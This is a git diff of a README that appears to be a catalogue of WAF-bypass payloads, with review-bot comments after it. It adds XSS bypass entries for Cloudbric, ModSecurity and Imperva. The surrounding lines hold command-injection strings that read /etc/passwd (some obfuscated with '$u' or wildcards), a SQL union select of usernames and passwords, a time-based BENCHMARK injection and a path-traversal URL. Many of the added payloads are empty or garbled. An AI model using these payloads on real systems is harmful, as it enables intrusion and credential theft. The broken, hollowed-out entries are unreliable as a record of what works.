diff --git a/README.md b/README.md index 3368edb..00389d1 100644 --- a/README.md +++ b/README.md @@ -3377,6 +3377,12 @@ cat$u+/etc$u/passwd$u ";cat+/etc/passwd+# ``` +### Cloudbric +- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection) +``` +pew +``` + ### Comodo - XSS Bypass by [@0xInfection](https://twitter.com/0xinfection) ``` @@ -3435,6 +3441,7 @@ Keep-Alive: 300 ```

alert dragme +click ``` - GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741) ``` @@ -3544,6 +3551,10 @@ BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+ ``` ### ModSecurity +- [XSS Bypass for CRS 3.2](https://twitter.com/brutelogic/status/1209086328383660033) by [@brutelogic](https://twitter.com/brutelogic) +``` + +```` - [RCE Payloads Detection Bypass for PL3](https://www.secjuice.com/web-application-firewall-waf-evasion/) by [@theMiddle](https://twitter.com/Menin_TheMiddle) (v3.1) ``` ;+$u+cat+/etc$u/passwd$u @@ -3594,6 +3605,10 @@ amUserId=1 union select username,password,3,4 from users ``` ### Imperva +- [XSS Bypass](https://twitter.com/0xInfection/status/1212331839743873026) by [@0xInfection](https://twitter.com/0xinfection) +``` +pew +``` - [XSS Bypass](https://twitter.com/_ugurercan/status/1188406765735632896) by [@ugurercan](https://twitter.com/_ugurercan) ```

@@ -3695,6 +3710,10 @@ https://host:2000/proxy.html?action=manage&main=log&show=deny_log&proxy=>" +``` - [Smuggling RCE Payloads](https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) by [@theMiddle](https://twitter.com/Menin_TheMiddle) ``` /???/??t+/???/??ss?? @@ -3769,6 +3788,7 @@ http://host.com/test.asp?file=.%./bla.txt - XSS Bypass by [@brute Logic](https://twitter.com/brutelogic) ``` + ``` - XSS Bypass by [@0xInfection](https://twitter.com/0xInfection) ```
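Review bot: The new Cloudbric section (hunk @@ -3377,6 +3377,12) records no product version or test date for the entry, while other entries in this README carry one, for example "(v4.02)" and "(v3.1)". Please add the version or date the bypass was confirmed against, so readers running that WAF can tell whether a later rule update already covers it.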
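Review bot: In the ModSecurity hunk (@@ -3544,6 +3551,10), the added CRS 3.2 entry opens its code block with three backticks and closes it with four. Every other block in the file uses three on both sides, so the closing fence should be changed to match. As shown in this diff, the block also has no content line between the fences, so please check that the file renders the entry as intended before merging.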
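Review bot: The entry added under Imperva (hunk @@ -3594,6 +3605,10) is a verbatim copy of the one added under Cloudbric in the first hunk: same status link, same author, same block content. If the linked source confirms the result against both products, say so in the link text of each entry (or cross-reference one from the other) so the duplication reads as deliberate. If it only covers one product, drop the other copy.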